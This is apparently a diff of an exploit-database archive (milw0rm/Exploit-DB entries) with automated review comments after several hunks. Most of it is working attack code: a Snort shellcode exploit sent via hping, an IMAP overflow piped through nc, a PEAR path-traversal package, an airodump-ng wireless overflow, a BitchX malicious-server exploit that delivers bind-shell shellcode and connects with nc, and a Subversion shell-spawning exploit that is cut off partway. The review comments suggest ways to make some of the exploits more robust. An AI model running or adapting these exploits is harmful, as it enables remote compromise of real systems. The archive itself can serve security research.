echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \ echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
$(echo $1 | cut -d. -f2) \ $(echo $1 | cut -d. -f2) \
$(echo $1 | cut -d. -f3) \ $(echo $1 | cut -d. -f3) \
$(echo $1 | cut -d. -f4)) >> egg $(echo $1 | cut -d. -f4)) >> egg
echo -n -e "\x66\x68\xb0" >> egg echo -n -e "\x66\x68\xb0" >> egg
echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg
echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
echo -n -e "\x01\xcd\x80" >> egg echo -n -e "\x01\xcd\x80" >> egg
# 3 dummy bytes for alignment purposes # 3 dummy bytes for alignment purposes
echo -n -e "\x41\x41\x41" >> egg echo -n -e "\x41\x41\x41" >> egg
i=0 i=0
cpt=$(expr 3840 - 134 - 512) cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4) cpt=$(expr $cpt / 4)
var1=0x$(echo $RET | cut -b7,8) var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6) var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4) var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2) var4=0x$(echo $RET | cut -b1,2)
while [ "$i" -lt "$cpt" ]; do while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1) i=$(expr "$i" + 1)
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done done
# hping ruleZ # hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \ -d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null 1>/dev/null 2>/dev/null
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \ -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
1>/dev/null 2>/dev/null 1>/dev/null 2>/dev/null
$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \ $HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \ -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
1>/dev/null 2>/dev/null 1>/dev/null 2>/dev/null
rm egg rm egg
echo "Exploit Sended" echo "Exploit Sended"
# milw0rm.com [2003-04-23] # milw0rm.com [2003-04-23]
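Review bot: whitespace-only hunk (both columns identical), the same line-ending normalisation as the rest of the commit. Two documentation points in the header block: the usage line names `p7snort119.sh` while the file name and the banner say `p7snort191.sh`, and `exit -1` under `#!/bin/sh` is not a valid exit status (the shell reports 255). `echo -n -e` is also not POSIX and is not honoured by every `/bin/sh`, which the header should mention since the script is advertised as plain `sh`.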

View file

@ -38,6 +38,6 @@ for ($i += length($shellcode); $i < $len; $i += 4) {
$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012"; $exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";
system("(echo -e \"$exploit_string\" ; cat) | nc $target 143"); system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");
# milw0rm.com [2001-01-19] # milw0rm.com [2001-01-19]

View file

@ -236,6 +236,6 @@ int main(int argc, char **argv) {
close(sock); close(sock);
return 0; return 0;
} }
// milw0rm.com [2001-03-03] // milw0rm.com [2001-03-03]

View file

@ -91,6 +91,6 @@ Ruben Garrote Garc
rubengarrote [at] gmail [dot] com rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com http://boken00.blogspot.com
EDB Note: ## EDB Note:
It seems 3.70 version has been patched against this. # It seems 3.70 version currently available for download
Later versions are probably vulnerable to this. # has been patched against this. Earlier versions are probably vulnerable to this.
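Review bot: the rewrite fixes the contradiction in the old note, which said 3.70 had been patched but that "Later versions" were probably vulnerable; "Earlier versions are probably vulnerable" is the only reading consistent with the first sentence, so the change is correct. Minor style point: the new lines use `##` for the heading and `#` for the body, two comment styles in a two-line note.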

14
platforms/linux/remote/30018.py Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/23887/info
Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.
Exploiting this issue allows remote attackers to read portions of memory.
Python 2.4.4-2 and 2.5 are confirmed vulnerable.
#!/usr/bin/python
import locale
print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))
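Review bot: the file is added with the executable bit set, but `#!/usr/bin/python` sits after four lines of unquoted advisory prose, so running it directly fails with a SyntaxError on the `source:` line; either comment the header or keep the shebang on line 1. The PoC also uses Python 2 `print` statements, consistent with the 2.4/2.5 builds it names, so it needs a Python 2 interpreter. For triage, the whole demonstration is the `repr(locale.strxfrm('a'))` call under the `pl_PL.UTF8` collation locale: a patched build prints a short transformed string, an affected one prints trailing bytes that do not belong to the input.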

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/24111/info
PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files.
An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations.
This issue affects PEAR 1.0 to 1.5.3.
create a file named "INSTALL" and save it in the current directory.
Save the following XML as package.xml, and run "pear install package.xml"
If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into
/usr/local/test.php
<?xml version="1.0" encoding="UTF-8"?>
<package version="2.0" xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Test_Sec</name>
<channel>pear.php.net</channel>
<summary>Test security vulnerability</summary>
<description>demonstrate install-as vulnerability
</description>
<lead>
<name>Greg Beaver</name>
<user>cellog</user>
<email>cellog@php.net</email>
<active>yes</active>
</lead>
<date>2007-03-05</date>
<version>
<release>1.6.0</release>
<api>1.6.0</api>
</version>
<stability>
<release>stable</release>
<api>stable</api>
</stability>
<license uri="http://www.php.net/license">PHP License</license>
<notes>
allow up to latest beta version [tias]
</notes>
<contents>
<dir name="/">
<file name="INSTALL" role="php" />
</dir> <!-- / -->
</contents>
<dependencies>
<required>
<php>
<min>4.3.0</min>
</php>
<pearinstaller>
<min>1.4.3</min>
</pearinstaller>
</required>
</dependencies>
<phprelease>
<filelist>
<install as="../../test.php" name="INSTALL" />
</filelist>
</phprelease>
</package>
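Review bot: the file mixes four lines of advisory prose and two lines of instructions with the XML document, so saving it verbatim as package.xml, as the instructions tell the reader to do, gives the installer input that does not begin with the XML declaration and fails to parse; the prose belongs in a separate header or in an XML comment. The `<install as="../../test.php" name="INSTALL" />` element under `<phprelease>` is the entire PoC: with php_dir at /usr/local/lib/php the two `..` components resolve to /usr/local/test.php, matching the text above the XML. The corresponding check on the installer side is to canonicalise the `as` path and refuse any result that escapes php_dir, which is the property a patched installer has to enforce.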

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24161/info
Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue affects Ruby on Rails 1.2.3; other versions may also be affected.
http://www.exploit-db.com/sploits/30089.tgz

View file

@ -1,186 +1,186 @@
/** /**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
* *
* Proof of concept exploit for a stack (and heap) based * Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited * overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to * by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range * execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng. * that are sniffing with a vulnerable version of airodump-ng.
* *
* This exploit requires the lorcon 802.11 packet injection * This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details. * library, see http://802.11ninja.net for details.
* *
* Compiling: * Compiling:
* *
* gcc -o airodump-remote airodump-remote.c -lorcon * gcc -o airodump-remote airodump-remote.c -lorcon
* *
* Usage: * Usage:
* *
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr] * ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
* *
* Drivers supported by lorcon: * Drivers supported by lorcon:
* *
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold, * wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw * rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
* *
* Header types: * Header types:
* *
* 0 - None (not tested) * 0 - None (not tested)
* 1 - Fake prism54 header * 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested) * 2 - Fake radiotap header (not tested)
* *
* Return addresses: * Return addresses:
* *
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934 * Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934 * Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
* *
* Example usage: * Example usage:
* *
* ./airodump-ng wlan0 prism54 11 1 0x8054934 * ./airodump-ng wlan0 prism54 11 1 0x8054934
* *
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ] * Author: Jonathan So [ jonny [ @ ] nop-art.net ]
* *
* Copyright (C) 2007 Jonathan So * Copyright (C) 2007 Jonathan So
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <tx80211.h> #include <tx80211.h>
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work // Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes. // here, it doesn't matter if it contains nulls. Maximum 792 bytes.
char shellcode[] = "\xeb\x14" // jmp get_message char shellcode[] = "\xeb\x14" // jmp get_message
// start: // start:
"\x59\x31\xdb\x31\xd2\xb2" "\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length "\x1b" // message length
"\x31\xc0\x88\x04\x11" "\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write "\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit "\xb0\x01\xcd\x80" // sys_exit
// get_message: // get_message:
"\xe8\xe7\xff\xff\xff" // call start "\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text "Stop sniffing our network!!"; // message text
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
tx80211_t tx; tx80211_t tx;
tx80211_packet_t txp; tx80211_packet_t txp;
uint8_t packet[1044]; uint8_t packet[1044];
uint8_t *ppacket; uint8_t *ppacket;
int headertype; int headertype;
unsigned ret_addr = 0x8054934; unsigned ret_addr = 0x8054934;
FILE *fp; FILE *fp;
if(argc<5) { if(argc<5) {
printf("usage: %s <interface> <driver> <channel> <arptype> printf("usage: %s <interface> <driver> <channel> <arptype>
[ret_addr]\n", argv[0]); [ret_addr]\n", argv[0]);
exit(1); exit(1);
} }
if(argc>5) { if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16); ret_addr = strtoul(argv[5], NULL, 16);
} }
headertype = atoi(argv[4]); headertype = atoi(argv[4]);
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) { TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver"); fprintf(stderr, "Error initializing driver");
return 1; return 1;
} }
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) { TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n"); fprintf(stderr, "Error setting inject mode\n");
return 1; return 1;
} }
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) { if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n"); fprintf(stderr, "Error setting channel\n");
} }
if (tx80211_open(&tx) < 0) { if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n"); fprintf(stderr, "Unable to open interface\n");
return 1; return 1;
} }
txp.packet = packet; txp.packet = packet;
// Fill packet with nops // Fill packet with nops
memset(packet, 0x90, sizeof(packet)); memset(packet, 0x90, sizeof(packet));
switch (headertype) { switch (headertype) {
case 0: case 0:
// No arptype, just send raw packet // No arptype, just send raw packet
ppacket = packet; ppacket = packet;
break; break;
case 1: case 1:
// Send fake prism header // Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4); memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8; ppacket = packet + 8;
break; break;
case 2: case 2:
// Send fake radiotap header // Send fake radiotap header
packet[0] = 0; packet[0] = 0;
packet[2] = 3; packet[2] = 3;
ppacket = packet + 3; ppacket = packet + 3;
break; break;
default: default:
printf("Invalid header type. Valid options are:\n"); printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n"); printf(" 0 - none\n");
printf(" 1 - prism54\n"); printf(" 1 - prism54\n");
printf(" 2 - radiotap\n"); printf(" 2 - radiotap\n");
return 1; return 1;
} }
// set some necessary 802.11 header fields // set some necessary 802.11 header fields
ppacket[0] = 0xB0; ppacket[0] = 0xB0;
ppacket[1] = 0; ppacket[1] = 0;
ppacket[24] = 1; ppacket[24] = 1;
ppacket[25] = 0; ppacket[25] = 0;
ppacket[26] = 2; ppacket[26] = 2;
ppacket[27] = 0; ppacket[27] = 0;
txp.plen = 512 + (ppacket - packet); txp.plen = 512 + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) { if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 1\n"); fprintf(stderr, "Error sending packet 1\n");
return 1; return 1;
} }
ppacket[26] = 4; ppacket[26] = 4;
if (tx80211_txpacket(&tx, &txp) < txp.plen) { if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 2\n"); fprintf(stderr, "Error sending packet 2\n");
return 1; return 1;
} }
// Insert shellcode at end of nopsled // Insert shellcode at end of nopsled
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode)); memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));
// Overwrite some char*, needs to be a valid address // Overwrite some char*, needs to be a valid address
memcpy(ppacket+1028, &ret_addr, 4); memcpy(ppacket+1028, &ret_addr, 4);
// Overwrite global variable sk_len, used as argument to memcpy // Overwrite global variable sk_len, used as argument to memcpy
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4); memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);
// Return address // Return address
memcpy(ppacket+820, &ret_addr, 4); memcpy(ppacket+820, &ret_addr, 4);
ppacket[1] = 0x40; ppacket[1] = 0x40;
txp.plen = 1036 + + (ppacket - packet); txp.plen = 1036 + + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) { if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 3\n"); fprintf(stderr, "Error sending packet 3\n");
return 1; return 1;
} }
tx80211_close(&tx); tx80211_close(&tx);
return 0; return 0;
} }
// milw0rm.com [2007-04-12] // milw0rm.com [2007-04-12]
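Review bot: `memset` and `memcpy` are used from `memset(packet, 0x90, sizeof(packet));` onward without `#include <string.h>`, so the build relies on implicit declarations; add the include next to `<stdio.h>` and `<stdlib.h>`. In the same function `FILE *fp;` is declared and never used, the `tx80211_setchannel` error branch prints its message but falls through instead of returning like every other error check here (either return 1 or comment that a failed channel set is tolerated), the driver-init error message is the only one without a trailing newline, and `txp.plen = 1036 + + (ppacket - packet);` has a doubled plus that is valid C but clearly a typo.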


@ -180,6 +180,6 @@ close(sock);
return 0; } return 0; }
return 0; } return 0; }
// milw0rm.com [2004-08-24] // milw0rm.com [2004-08-24]
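Review bot: both sides of this hunk are textually identical and the header `@ -180,6 +180,6 @@` keeps the line count, so what changed here appears to be whitespace or line endings only; a normalization like this is easiest to review when it is committed separately from content changes and the commit message states that it is whitespace-only.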


@ -1,123 +1,123 @@
#!/usr/bin/env ruby #!/usr/bin/env ruby
###################################################### ######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day] # BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit # By bannedit
# Discovered May 16th 2007 # Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT # - Yet another overflow which can overwrite GOT
# #
# I found this vuln after modifying ilja's ircfuzz # I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to # code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the # overwrite the GOT with the ret address to the
# shellcode. # shellcode.
# #
# The actually vulnerability appears to be a stack # The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions # overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can # the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we # only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap # overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT. # data. This allows us to overwrite the GOT.
# #
# Reliability of this exploit in its current stage is # Reliability of this exploit in its current stage is
# limited. There appears to be several factors which # limited. There appears to be several factors which
# restrict the reliability. # restrict the reliability.
####################################################### #######################################################
require 'socket' require 'socket'
#the linux 2.6 target most effective atm #the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' } '0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit shellcode = #fork before binding a shell provides a clean exit
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+ "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+
#metasploit linux x86 shellcode bind tcp port 4444 #metasploit linux x86 shellcode bind tcp port 4444
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+ "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
"\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+ "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
"\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+ "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
"\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+ "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
"\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+ "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
"\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+ "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
"\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38" "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
port = (ARGV[0] || 6667).to_i port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port) sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex) ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------" puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -" puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -" puts "- By bannedit -"
puts "----------------------------------------------" puts "----------------------------------------------"
puts "\n[-] listening for incoming clients..." puts "\n[-] listening for incoming clients..."
while (client = sock.accept) while (client = sock.accept)
ip = client.peeraddr ip = client.peeraddr
buffer = client.gets buffer = client.gets
puts "[<] #{buffer}" puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13 hostname = ([ret].pack('V')) * 13
nick = "bannedit" nick = "bannedit"
#Fake server reply to connection #Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iw\r\n"+ buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
":0 001 #{nick} :biznitch-1.0\r\n"+ ":0 001 #{nick} :biznitch-1.0\r\n"+
":5 002 #{nick} :biznitch-1.0\r\n"+ ":5 002 #{nick} :biznitch-1.0\r\n"+
":6 003 #{nick} :a\r\n"+ ":6 003 #{nick} :a\r\n"+
":aaa 004 #{nick} :a\r\n"+ ":aaa 004 #{nick} :a\r\n"+
":aaa 005 #{nick} :a\r\n"+ ":aaa 005 #{nick} :a\r\n"+
":aaa 251 #{nick} :a\r\n"+ ":aaa 251 #{nick} :a\r\n"+
":aaa 252 #{nick} :a\r\n"+ ":aaa 252 #{nick} :a\r\n"+
":aaa 253 #{nick} :a\r\n"+ ":aaa 253 #{nick} :a\r\n"+
":aaa 254 #{nick} :a\r\n"+ ":aaa 254 #{nick} :a\r\n"+
":aaa 255 #{nick} :a\r\n"+ ":aaa 255 #{nick} :a\r\n"+
":aaa 375 #{nick} :a\r\n"+ ":aaa 375 #{nick} :a\r\n"+
":aaa 372 #{nick} :a\r\n"+ ":aaa 372 #{nick} :a\r\n"+
":aaa 376 #{nick} :a\r\n" ":aaa 376 #{nick} :a\r\n"
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+ join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n" ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"
puts "[>] sending fake server response" puts "[>] sending fake server response"
client.send(buffer, 0) client.send(buffer, 0)
sleep(2) sleep(2)
# client.send(join, 0) # client.send(join, 0)
topic = ":aaa TOPIC #hackers:" topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200 ret = ret + 0x200
topic<< ([ret].pack('V')) * 100 topic<< ([ret].pack('V')) * 100
topic<< "\r\n" topic<< "\r\n"
for i in 0..20 for i in 0..20
client.send(topic, 0) client.send(topic, 0)
end end
puts "[>] sending evil buffer" puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE " evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa" evilbuf<< "#{nick} :aaa"
ret = ret + 0x200 ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200 evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "\x90" * (1126 - shellcode.length) evilbuf<< "\x90" * (1126 - shellcode.length)
evilbuf<< shellcode evilbuf<< shellcode
evilbuf<< "\x90" * 40 evilbuf<< "\x90" * 40
evilbuf<< "\r\n" evilbuf<< "\r\n"
for i in 0..5 for i in 0..5
client.send(evilbuf, 0) client.send(evilbuf, 0)
end end
sleep(10) #wait for the shellcode to do its thing... sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open" puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n" puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"
fork { fork {
system("nc #{ip[3]} 4444") system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener" puts "[+] exiting shell dropping back to listener"
} }
end end
# milw0rm.com [2007-08-27] # milw0rm.com [2007-08-27]
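Review bot: the target selection contradicts its own comment: `#the linux 2.6 target most effective atm` is followed by `ret = (targets['linux 2.6 Hardened (FC6)'].hex)`, which hard-codes a different entry and leaves the rest of the `targets` hash unused; take the target name from ARGV next to `port`, or fix the comment. In the accept loop the `client.send` calls have no rescue, so a peer that disconnects mid-send raises `Errno::EPIPE` and terminates the listener instead of returning to `sock.accept`, and the `fork { system("nc #{ip[3]} 4444") ... }` child is never waited for, so each connection leaves a zombie; wrap the loop body in begin/rescue and `Process.detach` the fork.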


@ -1,328 +1,328 @@
/***************************************************************** /*****************************************************************
* hoagie_subversion.c * hoagie_subversion.c
* *
* Remote exploit against Subversion-Servers. * Remote exploit against Subversion-Servers.
* *
* Author: greuff <greuff@void.at> * Author: greuff <greuff@void.at>
* *
* Tested on Subversion 1.0.0 and 0.37 * Tested on Subversion 1.0.0 and 0.37
* *
* Algorithm: * Algorithm:
* This is a two-stage exploit. The first stage overflows a buffer * This is a two-stage exploit. The first stage overflows a buffer
* on the stack and leaves us ~60 bytes of machine code to be * on the stack and leaves us ~60 bytes of machine code to be
* executed. We try to find the socket-fd there and then do a * executed. We try to find the socket-fd there and then do a
* read(2) on the socket. The exploit then sends the second stage * read(2) on the socket. The exploit then sends the second stage
* loader to the server, which can be of any length (up to the * loader to the server, which can be of any length (up to the
* obvious limits, of course). This second stage loader spawns * obvious limits, of course). This second stage loader spawns
* /bin/sh on the server and connects it to the socket-fd. * /bin/sh on the server and connects it to the socket-fd.
* *
* Credits: * Credits:
* void.at * void.at
* *
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT. * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM. * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
* *
*****************************************************************/ *****************************************************************/
#include <sys/socket.h> #include <sys/socket.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/time.h> #include <sys/time.h>
#include <unistd.h> #include <unistd.h>
#include <netinet/in.h> #include <netinet/in.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <stdio.h> #include <stdio.h>
#include <errno.h> #include <errno.h>
#include <string.h> #include <string.h>
#include <fcntl.h> #include <fcntl.h>
#include <netdb.h> #include <netdb.h>
enum protocol { SVN, SVNSSH, HTTP, HTTPS }; enum protocol { SVN, SVNSSH, HTTP, HTTPS };
char stage1loader[]= char stage1loader[]=
// begin socket fd search // begin socket fd search
"\x31\xdb" // xor %ebx, %ebx "\x31\xdb" // xor %ebx, %ebx
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
